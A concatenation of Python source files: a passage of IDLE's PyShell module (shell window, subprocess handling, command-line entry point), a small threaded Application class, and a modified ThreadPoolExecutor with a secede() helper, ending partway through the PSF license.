def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec", dont_inherit=True)
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, unicode) and IOBinding.encoding != 'utf-8':
try:
source = '# -*- coding: %s -*-\n%s' % (
IOBinding.encoding,
source.encode(IOBinding.encoding))
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python " + python_version() + " Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Window"),
("help", "_Help"),
]
# New classes
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdin = PseudoInputFile(self, "stdin", IOBinding.encoding)
self.stdout = PseudoOutputFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoOutputFile(self, "stderr", IOBinding.encoding)
self.console = PseudoOutputFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "help", "copyright", "credits" or "license()" for more information.'
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
from idlelib import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
        # (but only if this is before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.StackViewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super(PyShell, self).rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert', '<', 'iomark'):
return 'disabled'
return super(PyShell, self).rmenu_check_paste()
class PseudoFile(io.TextIOBase):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self._encoding = encoding
@property
def encoding(self):
return self._encoding
@property
def name(self):
return '<%s>' % self.tags
def isatty(self):
return True
class PseudoOutputFile(PseudoFile):
def writable(self):
return True
def write(self, s):
if self.closed:
raise ValueError("write to closed file")
if type(s) not in (unicode, str, bytearray):
# See issue #19481
if isinstance(s, unicode):
s = unicode.__getitem__(s, slice(None))
elif isinstance(s, str):
s = str.__str__(s)
elif isinstance(s, bytearray):
s = bytearray.__str__(s)
else:
raise TypeError('must be string, not ' + type(s).__name__)
return self.shell.write(s, self.tags)
class PseudoInputFile(PseudoFile):
def __init__(self, shell, tags, encoding=None):
PseudoFile.__init__(self, shell, tags, encoding)
self._line_buffer = ''
def readable(self):
return True
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, (int, long)):
raise TypeError('must be int, not ' + type(size).__name__)
result = self._line_buffer
self._line_buffer = ''
if size < 0:
while True:
line = self.shell.readline()
if not line: break
result += line
else:
while len(result) < size:
line = self.shell.readline()
if not line: break
result += line
self._line_buffer = result[size:]
result = result[:size]
return result
def readline(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, (int, long)):
raise TypeError('must be int, not ' + type(size).__name__)
line = self._line_buffer or self.shell.readline()
if size < 0:
size = len(line)
eol = line.find('\n', 0, size)
if eol >= 0:
size = eol + 1
self._line_buffer = line[size:]
return line[:size]
def close(self):
self.shell.close()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script, file=sys.stderr)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if dir not in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# start editor and/or shell windows:
root = Tk(className="Idle")
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
elif TkVersion >= 8.5 and sys.platform != 'darwin':
ext = '.png' if TkVersion >= 8.6 else '.gif'
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in (16, 32, 48)]
icons = [PhotoImage(file=iconfile) for iconfile in iconfiles]
root.tk.call('wm', 'iconphoto', str(root), "-default", *icons)
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if macosxSupport.isAquaTk():
# There are some screwed up <2> class bindings for text
# widgets defined in Tk which we need to do away with.
# See issue #24801.
root.unbind_class('Text', '<B2>')
root.unbind_class('Text', '<B2-Motion>')
root.unbind_class('Text', '<<PasteSelection>>')
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
                    # filename is actually a directory; disregard it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic OS X Tk versions and print a warning
# message in the IDLE shell window; this is less intrusive
# than always opening a separate window.
tkversionwarning = macosxSupport.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand("print('%s')" % tkversionwarning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
capture_warnings(False) # Make sure turned off; see issue 18081
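# --- A minimal, self-contained sketch (not part of IDLE) of the same ---
# --- save / swap / restore pattern that capture_warnings() uses above. ---
# The original warnings.showwarning is stashed exactly once while capture is
# on, a custom formatter is installed in its place, and the stashed hook is
# put back when capture is turned off.
def _demo_capture_warnings():
    import sys as _sys
    import warnings as _warnings

    saved = []  # holds the original showwarning while capture is active

    def _custom_showwarning(message, category, filename, lineno,
                            file=None, line=None):
        stream = file if file is not None else _sys.__stderr__
        stream.write("captured %s: %s (%s:%s)\n"
                     % (category.__name__, message, filename, lineno))

    def capture(on):
        if on and not saved:
            saved.append(_warnings.showwarning)
            _warnings.showwarning = _custom_showwarning
        elif not on and saved:
            _warnings.showwarning = saved.pop()

    capture(True)
    _warnings.warn("demo warning")
    capture(False)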
|
Application.py
|
import threading
from Assistant import Assistant
class Application():
def __init__(self):
self.assistant = Assistant()
self.__run = True
    def Start(self):  # Called once when the app starts
self.assistant.GreetingsUser()
self.assistant.ManageTrash()
    def End(self):  # Called once when the app ends
self.__run = False
    def Run(self):  # Called each time the app is started
self.Start()
# while(self.__run):
threading.Thread(target=self.assistant.ManageHours).start()
threading.Thread(target=self.assistant.ManageDownloads).start()
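# --- Hypothetical usage sketch; Assistant's behaviour is assumed, not shown ---
# --- here. A typical entry point builds the Application, calls Run() to     ---
# --- spawn the background threads, then keeps the main thread alive until   ---
# --- interrupted, finally flipping the run flag via End().                  ---
if __name__ == "__main__":
    import time
    app = Application()
    app.Run()
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        app.End()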
|
threadpoolexecutor.py
|
"""
Modified ThreadPoolExecutor to support threads leaving the thread pool
This includes a global `secede` method that a submitted function can call to
have its thread leave the ThreadPoolExecutor's thread pool. This allows the
thread pool to allocate another thread if necessary, and so is useful when a
function realises that it is going to be a long-running job and does not want
to keep occupying a slot in the pool. When the function finishes, its thread
will terminate gracefully.
This code copies and modifies two functions from the
`concurrent.futures.thread` module, notably `_worker` and
`ThreadPoolExecutor._adjust_thread_count` to allow for checking against a global
`threading.local` state. These functions are subject to the following license,
which is included as a comment at the end of this file:
https://docs.python.org/3/license.html
... and are under copyright by the Python Software Foundation
Copyright 2001-2016 Python Software Foundation; All Rights Reserved
"""
from __future__ import print_function, division, absolute_import
from concurrent.futures import thread
import logging
from threading import local, Thread
from .compatibility import get_thread_identity
logger = logging.getLogger(__name__)
thread_state = local()
def _worker(executor, work_queue):
thread_state.proceed = True
thread_state.executor = executor
try:
while thread_state.proceed:
task = work_queue.get()
if task is not None: # sentinel
task.run()
del task
elif thread._shutdown or executor is None or executor._shutdown:
work_queue.put(None)
return
del executor
except BaseException:
logger.critical('Exception in worker', exc_info=True)
finally:
del thread_state.proceed
del thread_state.executor
class ThreadPoolExecutor(thread.ThreadPoolExecutor):
def _adjust_thread_count(self):
if len(self._threads) < self._max_workers:
t = Thread(target=_worker, args=(self, self._work_queue))
t.daemon = True
self._threads.add(t)
t.start()
def secede():
""" Have this thread secede from the ThreadPoolExecutor """
thread_state.proceed = False
ident = get_thread_identity()
for t in thread_state.executor._threads:
if t.ident == ident:
thread_state.executor._threads.remove(t)
break
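# --- Illustrative-only sketch of secede() (assumes this module is imported as ---
# --- part of its package so the relative import above resolves): a submitted  ---
# --- task calls secede() so the pool may start a replacement worker while the ---
# --- long job keeps running on its now-independent thread.                    ---
def _secede_demo():
    import time

    def long_job():
        secede()         # leave the pool; the executor may spawn a new worker
        time.sleep(1)    # stand-in for a long-running computation
        return "done"

    pool = ThreadPoolExecutor(max_workers=2)
    future = pool.submit(long_job)
    return future.result()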
"""
PSF LICENSE AGREEMENT FOR PYTHON 3.5.2
======================================
1. This LICENSE AGREEMENT is between the Python Software Foundation ("PSF"), and
the Individual or Organization ("Licensee") accessing and otherwise using Python
3.5.2 software in source or binary form and its associated documentation.
2. Subject to the terms and conditions of this License Agreement, PSF hereby
grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce,
analyze, test, perform and/or display publicly, prepare derivative works,
distribute, and otherwise use Python 3.5.2 alone or in any derivative
version, provided, however, that PSF's License Agreement and PSF's notice of
copyright, i.e., "Copyright c 2001-2016 Python Software Foundation; All Rights
Reserved" are retained in Python 3.5.2 alone or in any derivative version
prepared by Licensee.
3. In the event Licensee prepares a derivative work that is based on or
incorporates Python 3.5.2 or any part thereof, and wants to make the
